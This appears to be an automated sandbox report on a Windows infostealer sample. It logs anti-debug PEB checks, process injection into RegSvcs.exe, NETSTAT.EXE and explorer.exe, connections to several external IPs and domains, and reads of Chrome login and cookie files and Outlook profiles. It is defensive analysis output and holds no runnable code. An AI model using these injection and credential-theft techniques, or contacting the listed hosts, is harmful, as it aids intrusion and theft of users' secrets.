Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FAD30 mov eax, dword ptr fs:[00000030h] 1_2_012FAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131C577 mov eax, dword ptr fs:[00000030h] 1_2_0131C577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01317D50 mov eax, dword ptr fs:[00000030h] 1_2_01317D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01333D43 mov eax, dword ptr fs:[00000030h] 1_2_01333D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01373540 mov eax, dword ptr fs:[00000030h] 1_2_01373540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A3D40 mov eax, dword ptr fs:[00000030h] 1_2_013A3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01321DB5 mov eax, dword ptr fs:[00000030h] 1_2_01321DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C05AC mov eax, dword ptr fs:[00000030h] 1_2_013C05AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013235A1 mov eax, dword ptr fs:[00000030h] 1_2_013235A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F2D8A mov eax, dword ptr fs:[00000030h] 1_2_012F2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132FD9B mov eax, dword ptr fs:[00000030h] 1_2_0132FD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01322581 mov eax, dword ptr fs:[00000030h] 1_2_01322581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B2D82 mov eax, dword ptr fs:[00000030h] 1_2_013B2D82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013A8DF1 mov eax, dword ptr fs:[00000030h] 1_2_013A8DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130D5E0 mov eax, dword ptr fs:[00000030h] 1_2_0130D5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BFDE2 mov eax, dword ptr fs:[00000030h] 1_2_013BFDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376DC9 mov eax, dword ptr fs:[00000030h] 1_2_01376DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376DC9 mov ecx, dword ptr fs:[00000030h] 1_2_01376DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132BC2C mov eax, dword ptr fs:[00000030h] 1_2_0132BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C740D mov eax, dword ptr fs:[00000030h] 1_2_013C740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1C06 mov eax, dword ptr fs:[00000030h] 1_2_013B1C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376C0A mov eax, dword ptr fs:[00000030h] 1_2_01376C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B477 mov eax, dword ptr fs:[00000030h] 1_2_0131B477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132AC7B mov eax, dword ptr fs:[00000030h] 1_2_0132AC7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131746D mov eax, dword ptr fs:[00000030h] 1_2_0131746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138C450 mov eax, dword ptr fs:[00000030h] 1_2_0138C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132A44B mov eax, dword ptr fs:[00000030h] 1_2_0132A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130849B mov eax, dword ptr fs:[00000030h] 1_2_0130849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B4496 mov eax, dword ptr fs:[00000030h] 1_2_013B4496
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B14FB mov eax, dword ptr fs:[00000030h] 1_2_013B14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01376CF0 mov eax, dword ptr fs:[00000030h] 1_2_01376CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8CD6 mov eax, dword ptr fs:[00000030h] 1_2_013C8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012F4F2E mov eax, dword ptr fs:[00000030h] 1_2_012F4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132E730 mov eax, dword ptr fs:[00000030h] 1_2_0132E730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131B73D mov eax, dword ptr fs:[00000030h] 1_2_0131B73D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131F716 mov eax, dword ptr fs:[00000030h] 1_2_0131F716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138FF10 mov eax, dword ptr fs:[00000030h] 1_2_0138FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C070D mov eax, dword ptr fs:[00000030h] 1_2_013C070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132A70E mov eax, dword ptr fs:[00000030h] 1_2_0132A70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130FF60 mov eax, dword ptr fs:[00000030h] 1_2_0130FF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8F6A mov eax, dword ptr fs:[00000030h] 1_2_013C8F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130EF40 mov eax, dword ptr fs:[00000030h] 1_2_0130EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01377794 mov eax, dword ptr fs:[00000030h] 1_2_01377794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01308794 mov eax, dword ptr fs:[00000030h] 1_2_01308794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013337F5 mov eax, dword ptr fs:[00000030h] 1_2_013337F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AFE3F mov eax, dword ptr fs:[00000030h] 1_2_013AFE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FE620 mov eax, dword ptr fs:[00000030h] 1_2_012FE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0132A61C mov eax, dword ptr fs:[00000030h] 1_2_0132A61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_012FC600 mov eax, dword ptr fs:[00000030h] 1_2_012FC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01328E00 mov eax, dword ptr fs:[00000030h] 1_2_01328E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013B1608 mov eax, dword ptr fs:[00000030h] 1_2_013B1608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0131AE73 mov eax, dword ptr fs:[00000030h] 1_2_0131AE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0130766D mov eax, dword ptr fs:[00000030h] 1_2_0130766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01307E41 mov eax, dword ptr fs:[00000030h] 1_2_01307E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013BAE44 mov eax, dword ptr fs:[00000030h] 1_2_013BAE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013746A7 mov eax, dword ptr fs:[00000030h] 1_2_013746A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C0EA5 mov eax, dword ptr fs:[00000030h] 1_2_013C0EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_0138FE87 mov eax, dword ptr fs:[00000030h] 1_2_0138FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013216E0 mov ecx, dword ptr fs:[00000030h] 1_2_013216E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013076E2 mov eax, dword ptr fs:[00000030h] 1_2_013076E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013C8ED6 mov eax, dword ptr fs:[00000030h] 1_2_013C8ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01338EC7 mov eax, dword ptr fs:[00000030h] 1_2_01338EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013AFEC0 mov eax, dword ptr fs:[00000030h] 1_2_013AFEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_013236CC mov eax, dword ptr fs:[00000030h] 1_2_013236CC
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359F358 mov eax, dword ptr fs:[00000030h] 10_2_0359F358
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359DB40 mov eax, dword ptr fs:[00000030h] 10_2_0359DB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C3B7A mov eax, dword ptr fs:[00000030h] 10_2_035C3B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359DB60 mov ecx, dword ptr fs:[00000030h] 10_2_0359DB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03668B58 mov eax, dword ptr fs:[00000030h] 10_2_03668B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA309 mov eax, dword ptr fs:[00000030h] 10_2_035BA309
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365131B mov eax, dword ptr fs:[00000030h] 10_2_0365131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036153CA mov eax, dword ptr fs:[00000030h] 10_2_036153CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BDBE9 mov eax, dword ptr fs:[00000030h] 10_2_035BDBE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C03E2 mov eax, dword ptr fs:[00000030h] 10_2_035C03E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03665BA5 mov eax, dword ptr fs:[00000030h] 10_2_03665BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C2397 mov eax, dword ptr fs:[00000030h] 10_2_035C2397
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CB390 mov eax, dword ptr fs:[00000030h] 10_2_035CB390
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035A1B8F mov eax, dword ptr fs:[00000030h] 10_2_035A1B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0364D380 mov ecx, dword ptr fs:[00000030h] 10_2_0364D380
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365138A mov eax, dword ptr fs:[00000030h] 10_2_0365138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C4BAD mov eax, dword ptr fs:[00000030h] 10_2_035C4BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0364B260 mov eax, dword ptr fs:[00000030h] 10_2_0364B260
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03668A62 mov eax, dword ptr fs:[00000030h] 10_2_03668A62
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03599240 mov eax, dword ptr fs:[00000030h] 10_2_03599240
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D927A mov eax, dword ptr fs:[00000030h] 10_2_035D927A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365EA55 mov eax, dword ptr fs:[00000030h] 10_2_0365EA55
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03624257 mov eax, dword ptr fs:[00000030h] 10_2_03624257
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B3A1C mov eax, dword ptr fs:[00000030h] 10_2_035B3A1C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03595210 mov eax, dword ptr fs:[00000030h] 10_2_03595210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03595210 mov ecx, dword ptr fs:[00000030h] 10_2_03595210
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359AA16 mov eax, dword ptr fs:[00000030h] 10_2_0359AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035A8A0A mov eax, dword ptr fs:[00000030h] 10_2_035A8A0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035D4A2C mov eax, dword ptr fs:[00000030h] 10_2_035D4A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BA229 mov eax, dword ptr fs:[00000030h] 10_2_035BA229
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0365AA16 mov eax, dword ptr fs:[00000030h] 10_2_0365AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C2ACB mov eax, dword ptr fs:[00000030h] 10_2_035C2ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C2AE4 mov eax, dword ptr fs:[00000030h] 10_2_035C2AE4
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CD294 mov eax, dword ptr fs:[00000030h] 10_2_035CD294
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035AAAB0 mov eax, dword ptr fs:[00000030h] 10_2_035AAAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035CFAB0 mov eax, dword ptr fs:[00000030h] 10_2_035CFAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035952A5 mov eax, dword ptr fs:[00000030h] 10_2_035952A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035BB944 mov eax, dword ptr fs:[00000030h] 10_2_035BB944
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359B171 mov eax, dword ptr fs:[00000030h] 10_2_0359B171
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359C962 mov eax, dword ptr fs:[00000030h] 10_2_0359C962
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_03599100 mov eax, dword ptr fs:[00000030h] 10_2_03599100
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035C513A mov eax, dword ptr fs:[00000030h] 10_2_035C513A
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B4120 mov eax, dword ptr fs:[00000030h] 10_2_035B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_035B4120 mov ecx, dword ptr fs:[00000030h] 10_2_035B4120
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_036241E8 mov eax, dword ptr fs:[00000030h] 10_2_036241E8
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 10_2_0359B1E1 mov eax, dword ptr fs:[00000030h] 10_2_0359B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 1_2_01339910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_01339910
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 38.55.236.89 80
Source: C:\Windows\explorer.exe Domain query: www.darkchocolatebliss.com
Source: C:\Windows\explorer.exe Domain query: www.marketmall.digital
Source: C:\Windows\explorer.exe Network Connect: 172.67.148.132 80
Source: C:\Windows\explorer.exe Network Connect: 54.38.220.85 80
Source: C:\Windows\explorer.exe Network Connect: 154.209.6.241 80
Source: C:\Windows\explorer.exe Network Connect: 89.31.143.1 80
Source: C:\Windows\explorer.exe Domain query: www.canadianlocalbusiness.com
Source: C:\Windows\explorer.exe Domain query: www.y31jaihdb6zm87.buzz
Source: C:\Windows\explorer.exe Network Connect: 162.213.255.142 80
Source: C:\Windows\explorer.exe Domain query: www.ope-cctv.com
Source: C:\Windows\explorer.exe Domain query: www.dersameh.com
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 1010000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AB0008
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\NHYGUnNN.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3452
Source: C:\Users\user\Desktop\NHYGUnNN.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regsvcs.exe
Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: XProgram Manager
Source: explorer.exe, 00000002.00000000.304298844.000000000835D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.253031171.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager (Not Responding)
Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295111764.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.274166451.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.274805423.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.295428852.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.241334039.0000000001080000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\NHYGUnNN.exe Queries volume information: C:\Users\user\Desktop\NHYGUnNN.exe VolumeInformation
Source: C:\Users\user\Desktop\NHYGUnNN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\NETSTAT.EXE Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\NETSTAT.EXE File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State

Remote Access Functionality

Source: Yara match File source: 0000000A.00000002.497449022.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.497846833.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.317923143.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.291033635.0000000013485000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY